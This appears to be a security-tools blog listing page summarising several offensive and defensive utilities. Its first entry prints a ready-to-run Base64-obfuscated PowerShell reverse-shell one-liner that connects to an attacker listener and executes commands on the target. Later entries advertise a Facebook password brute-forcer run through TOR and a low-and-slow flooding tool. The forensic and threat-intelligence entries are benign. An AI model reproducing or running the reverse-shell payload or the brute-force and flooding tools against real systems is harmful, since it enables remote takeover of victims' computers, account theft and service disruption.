ReverseTCPShell : PowerShell ReverseTCP Shell, Client & Server
ReverseTCPShell is a tool for Reverse Encrypted (AES 256-bit) Shell over TCP using PowerShell SecureString. Attacker (C2-Server Listener): PS> .ReverseTCP.ps1 Target (Client): CMD> ECHO IEX((::Unicode.GetString(::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEkAWABKADMAKwBBAE0AYgAzADIASgBXAEIAZgAyADkAdQBkAGoAcgBqAHYAeQBkAHUALwB4AFgARgBFAHUAYgB0AHQAVABhAHYAWAAwAGEAbwA9ACIAOwAkAEsAZQB5AD0AKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgBhAHMAZQA2ADQAKQApADsAJABDAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAwAC4AMAAuADEAJwAsADQANAA0ADQAKQA7ACQAUwB0AHIAZQBhAG0APQAkAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAQgB5AHQAZQBzAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABSAGUAYQBkAD0AJABTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAeQB0AGUAcwAsACAAMAAsACAAJABCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABDAG8AbQBtAGEAbgBkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB5AHQAZQBzACwAMAAsACAAJABSAGUAYQBkACkAOwAkAEQAZQBDAG8AZABlAD0AJABDAG8AbQBtAGEAbgBkACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQATwB1AHQAUAB1AHQAPQAoAEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAGkAbgBnAEEAdQB0AG8AKABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwBUAG8AQgBTAFQAUgAoACQARABlAEMAbwBkAGUAKQApACkAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQARQBuAEMAbwBkAGUAPQBDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABPAHUAdABQAHUAdAAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQAUwBlAG4AZABCAHkAdABlAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAEUAbgBDAG8AZABlACkAOwAkAFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABTAGUAbgBkAEIAeQB0AGUALAAwACwAJABTAGUAbgBkAEIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABTAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsARQB4AGkAdAA=}))));Exit | PowerShell - Also Read - Metabigor : Command Line Search Engines Without Any API Key PoC: Payload Execution: Analyze Encrypted Traffic: Download
RIPVT : Virus Total API Maltego Transform Set For Canari
ripVT is a Maltego Canari transforms for Virus Total private API. Provided AS-IS, no warranties, no guarantees. No jokes in this repo. It's as serious as you are. Installation Requires Canari, specifically this branch/versionInstall Malformity sudo python setup.py install canari create-profile ripVT Import generated ripVT.mtzImport entities stored at: src/ripVT/resources/external/entities.mtz Copy src/ripVT/resources/etc/ripVT.conf to ~/.canari/Pivot Pivots Multiple unique entities enable forward & reverse searches. Unique graphically-distinguished icons. Also Read -...
PcapXray : Tool To Visualize A Packet Capture Offline
PcapXray is a Network Forensics Tool to visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction. PcapXray Design Specification Goal: Given a Pcap File, plot a network diagram displaying hosts in the network, network traffic, highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication. Problem: Investigation...
IOCExtract : Advanced Indicator Of Compromise (IOC) Extractor
IOCExtract is an advanced Indicator of Compromise (IOC) extractor. This library extracts URLs, IP addresses, MD5/SHA hashes, email addresses, and YARA rules from text corpora. It includes some encoded and "defanged" IOCs in the output, and optionally decodes/refangs them. The Problem It is common practice for malware analysts or endpoint software to "defang" IOCs such as URLs and IP addresses, in order...
VTHunting : A Tiny Script Used to Generate Report About Virus Total Hunting
VTHunting is a tiny tool based on the VT api version 3 to run daily, weekly or monthly report about malware hunting. The report can be send via email, Slack channel or Telegram. The tool can also be used in cli to get a report anytime. The default number of result is 10 but it can be increase or...
Facebash : Facebook Brute Forcer In Shellscript Using TOR
Facebash is a tool for facebook Brute Forcer in shellscript using TOR. Warning : Facebook blocks account for 1 hour after 20 wrong passwords, so this script can perform only 20 pass/h. Features Save/Resume sessionsAnonymous attack through TORDefault Password List (+39k) Also Read - H2Buster : A Threaded, Recursive, Web Directory Brute-Force Scanner Over HTTP/2 Usage git clone https://github.com/thelinuxchoice/facebash cd instashell chmod +x facebash.sh service...
Finshir : A Coroutines-Driven Low & Slow Traffic Sender
Finshir is a high-performant, coroutines-driven, and fully customisable implementation of Low & Slow load generator designed for real-world pentesting. You can easily torify/proxify it using various platform-dependent utilities. Advantages Coroutines-driven. Finshir uses coroutines (also called lightweight threads) instead of ordinary threads, which lets you open many more connections with fewer system resources. Generic. Unlike other Low & Slow utilities, Finshir lets you...
Metabigor : Command Line Search Engines Without Any API Key
Metabigor allows you do query from command line to awesome Search Engines (like Shodan, Censys, Fofa, etc) without any API key. But Why ? Don't use your API key so you don't have to worry about litmit of API quotation. Do query from command line without Premium account. Get more result without Premium account. But I...
AutoPwn : Automate Repetitive Tasks For Fuzzing
Completely re-writing this right now. Focus will be on interactive Linux apps that only take input from stdin for starters. Attempting to use Shellphish's Driller and Fuzzer functionality. AutoPwn in it's current state will do this in limited form. Simply run autoPwn ./binary then select the Start option. Installing Given all the dependency issues here, the easiest way to...
UserRecon-PY : Find Username In Social Networks
Userrecon-PY is a tool used to find usernames in social networks. Installation Install dependencies (Debian/Ubuntu): sudo apt install python3 python3-pip Install with pip3: sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git userrecon-py --help Also Read - H2Buster : A Threaded, Recursive, Web Directory Brute-Force Scanner Over HTTP/2 Building from Source Clone this repository, and: git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py sudo -H pip3 install -r requirements.txt python3 setup.py build sudo python3...
